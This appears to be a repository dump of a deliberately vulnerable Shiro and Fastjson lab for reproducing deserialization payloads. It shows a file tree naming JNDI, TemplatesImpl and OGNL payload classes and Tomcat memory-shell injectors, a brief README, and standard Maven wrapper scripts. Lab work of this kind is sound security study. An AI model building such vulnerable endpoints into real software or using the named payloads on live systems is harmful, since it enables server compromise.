├── .gitignore
├── .mvn
└── wrapper
│ ├── MavenWrapperDownloader.java
│ ├── maven-wrapper.jar
│ └── maven-wrapper.properties
├── README.md
├── mvnw
├── mvnw.cmd
├── pom.xml
└── src
├── main
├── java
│ └── com
│ │ └── shiro
│ │ └── vuln
│ │ ├── ShiroAndFastJsonApplication.java
│ │ ├── controller
│ │ ├── IndexController.java
│ │ ├── SerController.java
│ │ └── UserController.java
│ │ ├── fastjson
│ │ ├── Calc.java
│ │ ├── Fastjson01_JNDI.java
│ │ ├── Fastjson02_TemplatesImpl.java
│ │ ├── Fastjson03_Becl.java
│ │ ├── Fastjson04_JDK11.java
│ │ ├── Fastjson05_io_write_1.java
│ │ ├── Fastjson06_io_write_2.java
│ │ ├── Fastjson07_io_write_3.java
│ │ ├── Fastjson08_io_write_4.java
│ │ ├── Fastjson09_io_read.java
│ │ ├── Fastjson10_io_read_error_dnslog.java
│ │ ├── Fastjson11_C3P0.java
│ │ ├── Fastjson12_mysql_1.java
│ │ ├── Fastjson13_mysql_2.java
│ │ ├── Fastjson14_mysql_3.java
│ │ ├── Fastjson15_mysql_4.java
│ │ ├── Fastjson16_pgsql.java
│ │ ├── Fastjson17_groovy.java
│ │ ├── Fastjson18_ajt_read_error_dnslog.java
│ │ ├── Fastjson19_ajt_read_error_dnslog_2.java
│ │ ├── Fastjson20_ajt_ognl_io_read_httplog.java
│ │ ├── Fastjson21_ajt_xalan_dom4j_io_read_httplog.java
│ │ ├── Fastjson22_ognl_io_read_error_dnslog.java
│ │ ├── Fastjson23_ognl_io_read_print.java
│ │ ├── Fastjson24_ognl_io_write_1.java
│ │ ├── Fastjson25_ognl_io_write_2.java
│ │ ├── Fastjson26_ognl_io_write_4.java
│ │ ├── Fastjson27_xalan_dom4j_io_read_error_dnslog.java
│ │ ├── Fastjson28_xalan_dom4j_io_read_print.java
│ │ ├── Fastjson29_xalan_dom4j_io_write_1.java
│ │ ├── Fastjson30_xalan_dom4j_io_write_2.java
│ │ ├── Fastjson31_xalan_dom4j_io_write_4.java
│ │ ├── Fastjson32_python_pgsql.java
│ │ └── TemplatesImplcmd.java
│ │ ├── filter
│ │ ├── MemBehinder3.java
│ │ └── MemBehinderFilter.java
│ │ └── shiro
│ │ ├── MainRealm.java
│ │ └── ShiroConfig.java
└── resources
│ └── application.properties
└── test
└── java
├── TomcatEcho.class
├── TomcatEcho.java
├── TomcatHeaderSize.class
├── TomcatHeaderSize.java
├── TomcatMemShellInject.class
└── TomcatMemShellInject.java
/.gitignore:
--------------------------------------------------------------------------------
1 | HELP.md
2 | target/
3 | !.mvn/wrapper/maven-wrapper.jar
4 | !**/src/main/**/target/
5 | !**/src/test/**/target/
6 |
7 | .DS_Store
8 |
9 | ### STS ###
10 | .apt_generated
11 | .classpath
12 | .factorypath
13 | .project
14 | .settings
15 | .springBeans
16 | .sts4-cache
17 |
18 | ### IntelliJ IDEA ###
19 | .idea
20 | *.iws
21 | *.iml
22 | *.ipr
23 |
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 |
34 | ### VS Code ###
35 | .vscode/
36 |
--------------------------------------------------------------------------------
/.mvn/wrapper/MavenWrapperDownloader.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2007-present the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * https://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | import java.net.*;
18 | import java.io.*;
19 | import java.nio.channels.*;
20 | import java.util.Properties;
21 |
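public class MavenWrapperDownloader {

    private static final String WRAPPER_VERSION = "0.5.6";
    /**
     * Default URL to download the maven-wrapper.jar from, if no 'downloadUrl' is provided.
     */
    private static final String DEFAULT_DOWNLOAD_URL = "https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/"
            + WRAPPER_VERSION + "/maven-wrapper-" + WRAPPER_VERSION + ".jar";

    /**
     * Path to the maven-wrapper.properties file, which might contain a downloadUrl property to
     * use instead of the default one.
     */
    private static final String MAVEN_WRAPPER_PROPERTIES_PATH =
            ".mvn/wrapper/maven-wrapper.properties";

    /**
     * Path where the maven-wrapper.jar will be saved to.
     */
    private static final String MAVEN_WRAPPER_JAR_PATH =
            ".mvn/wrapper/maven-wrapper.jar";

    /**
     * Name of the property which should be used to override the default download url for the wrapper.
     */
    private static final String PROPERTY_NAME_WRAPPER_URL = "wrapperUrl";

    /**
     * Downloads maven-wrapper.jar into {@code <base>/.mvn/wrapper/} and exits with 0 on
     * success, 1 on failure or when no base directory argument was given.
     *
     * <p>The URL is {@link #DEFAULT_DOWNLOAD_URL} unless maven-wrapper.properties below the
     * base directory sets {@code wrapperUrl}. The jar written here is executed as-is by the
     * mvnw scripts; nothing in this class verifies it against a checksum or signature, so the
     * trust boundary is whoever controls that properties file and the URL's transport.
     *
     * @param args {@code args[0]} is the project base directory; further elements are ignored
     */
    public static void main(String[] args) {
        System.out.println("- Downloader started");
        // The original indexed args[0] unconditionally; fail with a message instead of an
        // ArrayIndexOutOfBoundsException when mvnw hands over no argument.
        if (args.length == 0) {
            System.out.println("- ERROR base directory argument missing");
            System.exit(1);
        }
        File baseDirectory = new File(args[0]);
        System.out.println("- Using base directory: " + baseDirectory.getAbsolutePath());

        String url = resolveDownloadUrl(baseDirectory);
        System.out.println("- Downloading from: " + url);

        File outputFile = new File(baseDirectory.getAbsolutePath(), MAVEN_WRAPPER_JAR_PATH);
        File outputDir = outputFile.getParentFile();
        // Report but do not abort: the download below fails with its own error if the
        // directory is really missing (same behaviour as before).
        if (!outputDir.exists() && !outputDir.mkdirs()) {
            System.out.println(
                    "- ERROR creating output directory '" + outputDir.getAbsolutePath() + "'");
        }
        System.out.println("- Downloading to: " + outputFile.getAbsolutePath());
        try {
            downloadFileFromURL(url, outputFile);
            System.out.println("Done");
            System.exit(0);
        } catch (Throwable e) {
            // Program boundary: report everything and make the wrapper start fail.
            System.out.println("- Error downloading");
            e.printStackTrace();
            System.exit(1);
        }
    }

    /**
     * Reads {@code wrapperUrl} from maven-wrapper.properties below {@code baseDirectory}.
     *
     * @param baseDirectory project base directory (parent of {@code .mvn})
     * @return the configured URL, or {@link #DEFAULT_DOWNLOAD_URL} when the file is absent,
     *     unreadable (reported on stdout) or lacks the property
     */
    private static String resolveDownloadUrl(File baseDirectory) {
        File propertyFile = new File(baseDirectory, MAVEN_WRAPPER_PROPERTIES_PATH);
        if (!propertyFile.exists()) {
            return DEFAULT_DOWNLOAD_URL;
        }
        // try-with-resources replaces the manual close-in-finally; pom.xml targets Java 8.
        try (FileInputStream in = new FileInputStream(propertyFile)) {
            Properties properties = new Properties();
            properties.load(in);
            return properties.getProperty(PROPERTY_NAME_WRAPPER_URL, DEFAULT_DOWNLOAD_URL);
        } catch (IOException e) {
            System.out.println("- ERROR loading '" + MAVEN_WRAPPER_PROPERTIES_PATH + "'");
            return DEFAULT_DOWNLOAD_URL;
        }
    }

    /**
     * Streams {@code urlString} into {@code destination}, overwriting any existing file.
     *
     * <p>When both MVNW_USERNAME and MVNW_PASSWORD are set they become the JVM-wide default
     * {@link Authenticator}, i.e. they are offered to whichever host challenges — including a
     * host named by a {@code wrapperUrl} from the properties file.
     *
     * @param urlString URL to fetch
     * @param destination file to write
     * @throws Exception on a malformed URL or any I/O failure; the original left the output
     *     stream open on failure, here every channel is closed on both paths
     */
    private static void downloadFileFromURL(String urlString, File destination) throws Exception {
        String username = System.getenv("MVNW_USERNAME");
        String passwordValue = System.getenv("MVNW_PASSWORD");
        if (username != null && passwordValue != null) {
            char[] password = passwordValue.toCharArray();
            Authenticator.setDefault(new Authenticator() {
                @Override
                protected PasswordAuthentication getPasswordAuthentication() {
                    return new PasswordAuthentication(username, password);
                }
            });
        }
        URL website = new URL(urlString);
        try (ReadableByteChannel source = Channels.newChannel(website.openStream());
             FileOutputStream fos = new FileOutputStream(destination);
             FileChannel sink = fos.getChannel()) {
            // transferFrom may stop before the stream is exhausted; keep going until it
            // reports that nothing more could be moved.
            long position = 0;
            long moved;
            while ((moved = sink.transferFrom(source, position, Long.MAX_VALUE - position)) > 0) {
                position += moved;
            }
        }
    }

}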
119 |
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/.mvn/wrapper/maven-wrapper.jar
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.properties:
--------------------------------------------------------------------------------
1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.1/apache-maven-3.8.1-bin.zip
2 | wrapperUrl=https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ShiroAndFastJson
2 |
3 | shiro加fastjson环境
4 |
5 | # 说明
6 | fastjson包下为各版本payload复现,来自https://github.com/kezibei/fastjson_payload。
7 | 我在原项目基础上加了maven相关依赖,以及一点修改。
8 |
9 |
10 |
11 | web复现
12 |
13 | 路由访问:
14 |
15 | /login 登录
16 |
17 | /json json解析
18 |
19 | /ser 反序列化
20 |
21 |
--------------------------------------------------------------------------------
/mvnw:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # ----------------------------------------------------------------------------
3 | # Licensed to the Apache Software Foundation (ASF) under one
4 | # or more contributor license agreements. See the NOTICE file
5 | # distributed with this work for additional information
6 | # regarding copyright ownership. The ASF licenses this file
7 | # to you under the Apache License, Version 2.0 (the
8 | # "License"); you may not use this file except in compliance
9 | # with the License. You may obtain a copy of the License at
10 | #
11 | # https://www.apache.org/licenses/LICENSE-2.0
12 | #
13 | # Unless required by applicable law or agreed to in writing,
14 | # software distributed under the License is distributed on an
15 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
16 | # KIND, either express or implied. See the License for the
17 | # specific language governing permissions and limitations
18 | # under the License.
19 | # ----------------------------------------------------------------------------
20 |
21 | # ----------------------------------------------------------------------------
22 | # Maven Start Up Batch script
23 | #
24 | # Required ENV vars:
25 | # ------------------
26 | # JAVA_HOME - location of a JDK home dir
27 | #
28 | # Optional ENV vars
29 | # -----------------
30 | # M2_HOME - location of maven2's installed home dir
31 | # MAVEN_OPTS - parameters passed to the Java VM when running Maven
32 | # e.g. to debug Maven itself, use
33 | # set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
34 | # MAVEN_SKIP_RC - flag to disable loading of mavenrc files
35 | # ----------------------------------------------------------------------------
36 |
# /etc/mavenrc and ~/.mavenrc are sourced (executed in this shell) unless MAVEN_SKIP_RC
# is set, so their contents run with this user's privileges before Maven starts.
if [ -z "$MAVEN_SKIP_RC" ] ; then

  if [ -f /etc/mavenrc ] ; then
    . /etc/mavenrc
  fi

  if [ -f "$HOME/.mavenrc" ] ; then
    . "$HOME/.mavenrc"
  fi

fi

# OS specific support.  $var _must_ be set to either true or false.
cygwin=false;
darwin=false;
mingw=false
case "`uname`" in
  CYGWIN*) cygwin=true ;;
  MINGW*) mingw=true;;
  Darwin*) darwin=true
    # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
    # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
    if [ -z "$JAVA_HOME" ]; then
      if [ -x "/usr/libexec/java_home" ]; then
        export JAVA_HOME="`/usr/libexec/java_home`"
      else
        export JAVA_HOME="/Library/Java/Home"
      fi
    fi
    ;;
esac

if [ -z "$JAVA_HOME" ] ; then
  if [ -r /etc/gentoo-release ] ; then
    JAVA_HOME=`java-config --jre-home`
  fi
fi

# M2_HOME defaults to the parent of the directory holding this script ($0),
# following symlinks one hop at a time with ls/expr (portable to shells without readlink).
if [ -z "$M2_HOME" ] ; then
  ## resolve links - $0 may be a link to maven's home
  PRG="$0"

  # need this for relative symlinks
  while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
      PRG="$link"
    else
      PRG="`dirname "$PRG"`/$link"
    fi
  done

  saveddir=`pwd`

  M2_HOME=`dirname "$PRG"`/..

  # make it fully qualified
  M2_HOME=`cd "$M2_HOME" && pwd`

  cd "$saveddir"
  # echo Using m2 at $M2_HOME
fi

# For Cygwin, ensure paths are in UNIX format before anything is touched
if $cygwin ; then
  [ -n "$M2_HOME" ] &&
    M2_HOME=`cygpath --unix "$M2_HOME"`
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
  [ -n "$CLASSPATH" ] &&
    CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
fi

# For Mingw, ensure paths are in UNIX format before anything is touched
if $mingw ; then
  [ -n "$M2_HOME" ] &&
    M2_HOME="`(cd "$M2_HOME"; pwd)`"
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
fi

# Last resort for JAVA_HOME: derive it from the javac found on PATH, so whatever
# directory is first on PATH decides which JDK runs Maven.
if [ -z "$JAVA_HOME" ]; then
  javaExecutable="`which javac`"
  if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
    # readlink(1) is not available as standard on Solaris 10.
    readLink=`which readlink`
    if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
      if $darwin ; then
        javaHome="`dirname \"$javaExecutable\"`"
        javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
      else
        javaExecutable="`readlink -f \"$javaExecutable\"`"
      fi
      javaHome="`dirname \"$javaExecutable\"`"
      javaHome=`expr "$javaHome" : '\(.*\)/bin'`
      JAVA_HOME="$javaHome"
      export JAVA_HOME
    fi
  fi
fi

# JAVACMD: explicit override, else $JAVA_HOME/bin/java (or the AIX location), else PATH lookup.
if [ -z "$JAVACMD" ] ; then
  if [ -n "$JAVA_HOME"  ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
      # IBM's JDK on AIX uses strange locations for the executables
      JAVACMD="$JAVA_HOME/jre/sh/java"
    else
      JAVACMD="$JAVA_HOME/bin/java"
    fi
  else
    JAVACMD="`which java`"
  fi
fi

if [ ! -x "$JAVACMD" ] ; then
  echo "Error: JAVA_HOME is not defined correctly." >&2
  echo "  We cannot execute $JAVACMD" >&2
  exit 1
fi

if [ -z "$JAVA_HOME" ] ; then
  echo "Warning: JAVA_HOME environment variable is not set."
fi

# Not referenced again in this script; the wrapper is started via WRAPPER_LAUNCHER below.
CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
163 |
164 | # traverses directory structure from process work directory to filesystem root
165 | # first directory with .mvn subdirectory is considered project base directory
find_maven_basedir() {
  # Walk upward from $1 until a directory that contains .mvn is found and print it;
  # print $1 itself when the walk reaches / without a hit. With no argument, print a
  # message and return 1. basedir/wdir are not local (plain POSIX sh), as before.
  if [ -z "$1" ]; then
    echo "Path not specified to find_maven_basedir"
    return 1
  fi

  basedir="$1"
  wdir="$1"
  until [ "$wdir" = '/' ]; do
    if [ -d "$wdir"/.mvn ]; then
      basedir=$wdir
      break
    fi
    # workaround for JBEAP-8937 (on Solaris 10/Sparc): only step up when the
    # current directory really exists
    [ -d "${wdir}" ] && wdir=`cd "$wdir/.."; pwd`
    # end of workaround
  done
  echo "${basedir}"
}
189 |
190 | # concatenates all lines of a file
concat_lines() {
  # Print the file $1 with runs of newlines squeezed into single spaces; print nothing
  # when $1 is not a regular file. Used to turn .mvn/jvm.config into JVM flags.
  [ -f "$1" ] || return 0
  echo "$(tr -s '\n' ' ' < "$1")"
}
196 |
BASE_DIR=`find_maven_basedir "$(pwd)"`
if [ -z "$BASE_DIR" ]; then
  exit 1;
fi

##########################################################################################
# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
# This allows using the maven wrapper in projects that prohibit checking in binary data.
##########################################################################################
if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Found .mvn/wrapper/maven-wrapper.jar"
    fi
else
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
    fi
    # URL precedence: wrapperUrl from maven-wrapper.properties wins over MVNW_REPOURL,
    # which wins over Maven Central. None of the downloads below checks the jar against a
    # checksum or signature, so the jar that is then executed is trusted on the strength of
    # that URL (and of HTTPS when the URL uses it).
    if [ -n "$MVNW_REPOURL" ]; then
      jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
    else
      jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
    fi
    while IFS="=" read key value; do
      case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
      esac
    done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
    if [ "$MVNW_VERBOSE" = true ]; then
      echo "Downloading from: $jarUrl"
    fi
    wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
    if $cygwin; then
      wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
    fi

    if command -v wget > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found wget ... using wget"
        fi
        # MVNW_USERNAME/MVNW_PASSWORD are passed as command-line options (unquoted), so they
        # are visible to other local users in the process list for the duration of the
        # download; the Java fallback below reads the same variables from the environment.
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            wget "$jarUrl" -O "$wrapperJarPath"
        else
            wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
        fi
    elif command -v curl > /dev/null; then
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Found curl ... using curl"
        fi
        # Same process-list exposure as the wget branch (--user on the command line).
        if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
            curl -o "$wrapperJarPath" "$jarUrl" -f
        else
            curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
        fi

    else
        if [ "$MVNW_VERBOSE" = true ]; then
          echo "Falling back to using Java to download"
        fi
        javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
        # For Cygwin, switch paths to Windows format before running javac
        if $cygwin; then
          javaClass=`cygpath --path --windows "$javaClass"`
        fi
        if [ -e "$javaClass" ]; then
            if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Compiling MavenWrapperDownloader.java ..."
                fi
                # Compiling the Java class
                ("$JAVA_HOME/bin/javac" "$javaClass")
            fi
            if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
                # Running the downloader
                if [ "$MVNW_VERBOSE" = true ]; then
                  echo " - Running MavenWrapperDownloader.java ..."
                fi
                # MAVEN_PROJECTBASEDIR is only exported further down this script, so unless
                # the caller exported it already the downloader receives an empty argument
                # here and, in practice, resolves .mvn/wrapper against the current directory.
                ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
            fi
        fi
    fi
fi
##########################################################################################
# End of extension
##########################################################################################

export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
if [ "$MVNW_VERBOSE" = true ]; then
  echo $MAVEN_PROJECTBASEDIR
fi
# The contents of .mvn/jvm.config are spliced unquoted into MAVEN_OPTS and hence onto the
# java command line below — whoever can edit that file controls the JVM flags.
MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"

# For Cygwin, switch paths to Windows format before running java
if $cygwin; then
  [ -n "$M2_HOME" ] &&
    M2_HOME=`cygpath --path --windows "$M2_HOME"`
  [ -n "$JAVA_HOME" ] &&
    JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
  [ -n "$CLASSPATH" ] &&
    CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
  [ -n "$MAVEN_PROJECTBASEDIR" ] &&
    MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
fi

# Provide a "standardized" way to retrieve the CLI args that will
# work with both Windows and non-Windows executions.
MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
export MAVEN_CMD_LINE_ARGS

WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain

# Replaces this shell with the JVM; $MAVEN_OPTS is intentionally unquoted so it splits
# into separate flags.
exec "$JAVACMD" \
  $MAVEN_OPTS \
  -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
  "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
  ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
311 |
--------------------------------------------------------------------------------
/mvnw.cmd:
--------------------------------------------------------------------------------
1 | @REM ----------------------------------------------------------------------------
2 | @REM Licensed to the Apache Software Foundation (ASF) under one
3 | @REM or more contributor license agreements. See the NOTICE file
4 | @REM distributed with this work for additional information
5 | @REM regarding copyright ownership. The ASF licenses this file
6 | @REM to you under the Apache License, Version 2.0 (the
7 | @REM "License"); you may not use this file except in compliance
8 | @REM with the License. You may obtain a copy of the License at
9 | @REM
10 | @REM https://www.apache.org/licenses/LICENSE-2.0
11 | @REM
12 | @REM Unless required by applicable law or agreed to in writing,
13 | @REM software distributed under the License is distributed on an
14 | @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
15 | @REM KIND, either express or implied. See the License for the
16 | @REM specific language governing permissions and limitations
17 | @REM under the License.
18 | @REM ----------------------------------------------------------------------------
19 |
20 | @REM ----------------------------------------------------------------------------
21 | @REM Maven Start Up Batch script
22 | @REM
23 | @REM Required ENV vars:
24 | @REM JAVA_HOME - location of a JDK home dir
25 | @REM
26 | @REM Optional ENV vars
27 | @REM M2_HOME - location of maven2's installed home dir
28 | @REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
29 | @REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
30 | @REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
31 | @REM e.g. to debug Maven itself, use
32 | @REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
33 | @REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
34 | @REM ----------------------------------------------------------------------------
35 |
@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
@echo off
@REM set title of command window
title %0
@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
@if "%MAVEN_BATCH_ECHO%" == "on"  echo %MAVEN_BATCH_ECHO%

@REM set %HOME% to equivalent of $HOME
if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")

@REM Execute a user defined script before this one
@REM mavenrc_pre.* under %HOME% is run with this user's rights unless MAVEN_SKIP_RC is set.
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
@REM check for pre script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
:skipRcPre

@setlocal

set ERROR_CODE=0

@REM To isolate internal variables from possible post scripts, we use another setlocal
@setlocal

@REM ==== START VALIDATION ====
if not "%JAVA_HOME%" == "" goto OkJHome

echo.
echo Error: JAVA_HOME not found in your environment. >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error

:OkJHome
if exist "%JAVA_HOME%\bin\java.exe" goto init

echo.
echo Error: JAVA_HOME is set to an invalid directory. >&2
echo JAVA_HOME = "%JAVA_HOME%" >&2
echo Please set the JAVA_HOME variable in your environment to match the >&2
echo location of your Java installation. >&2
echo.
goto error

@REM ==== END VALIDATION ====

:init

@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
@REM Fallback to current working directory if not found.

set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir

set EXEC_DIR=%CD%
set WDIR=%EXEC_DIR%
:findBaseDir
IF EXIST "%WDIR%"\.mvn goto baseDirFound
cd ..
IF "%WDIR%"=="%CD%" goto baseDirNotFound
set WDIR=%CD%
goto findBaseDir

:baseDirFound
set MAVEN_PROJECTBASEDIR=%WDIR%
cd "%EXEC_DIR%"
goto endDetectBaseDir

:baseDirNotFound
set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
cd "%EXEC_DIR%"

:endDetectBaseDir

@REM Every line of .mvn\jvm.config is appended to the java command line below, unquoted.
IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig

@setlocal EnableExtensions EnableDelayedExpansion
for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%

:endReadAdditionalConfig

SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain

set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"

@REM A wrapperUrl entry in maven-wrapper.properties replaces DOWNLOAD_URL verbatim; the jar
@REM fetched from it is executed below without any checksum or signature verification.
FOR /F "tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
    IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
)

@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
@REM Note on the PowerShell download: MVNW_USERNAME, MVNW_PASSWORD, DOWNLOAD_URL and
@REM WRAPPER_JAR are expanded textually into single-quoted PowerShell strings, so a value
@REM containing a quote changes the command itself - keep them to plain characters. The
@REM credential test uses -not (A -and B), i.e. credentials are attached when either
@REM variable is set, not only when both are.
if exist %WRAPPER_JAR% (
    if "%MVNW_VERBOSE%" == "true" (
        echo Found %WRAPPER_JAR%
    )
) else (
    if not "%MVNW_REPOURL%" == "" (
        SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
    )
    if "%MVNW_VERBOSE%" == "true" (
        echo Couldn't find %WRAPPER_JAR%, downloading it ...
        echo Downloading from: %DOWNLOAD_URL%
    )

    powershell -Command "&{"^
		"$webclient = new-object System.Net.WebClient;"^
		"if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
		"$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
		"}"^
		"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
		"}"
    if "%MVNW_VERBOSE%" == "true" (
        echo Finished downloading %WRAPPER_JAR%
    )
)
@REM End of extension

@REM Provide a "standardized" way to retrieve the CLI args that will
@REM work with both Windows and non-Windows executions.
set MAVEN_CMD_LINE_ARGS=%*

%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
if ERRORLEVEL 1 goto error
goto end

:error
set ERROR_CODE=1

:end
@endlocal & set ERROR_CODE=%ERROR_CODE%

@REM mavenrc_post.* under %HOME% runs after Maven, again unless MAVEN_SKIP_RC is set.
if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
@REM check for post script, once with legacy .bat ending and once with .cmd ending
if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
:skipRcPost

@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
if "%MAVEN_BATCH_PAUSE%" == "on" pause

if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%

exit /B %ERROR_CODE%
183 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
4 | 4.0.0
5 |
6 | org.springframework.boot
7 | spring-boot-starter-parent
8 | 2.4.5
9 |
10 |
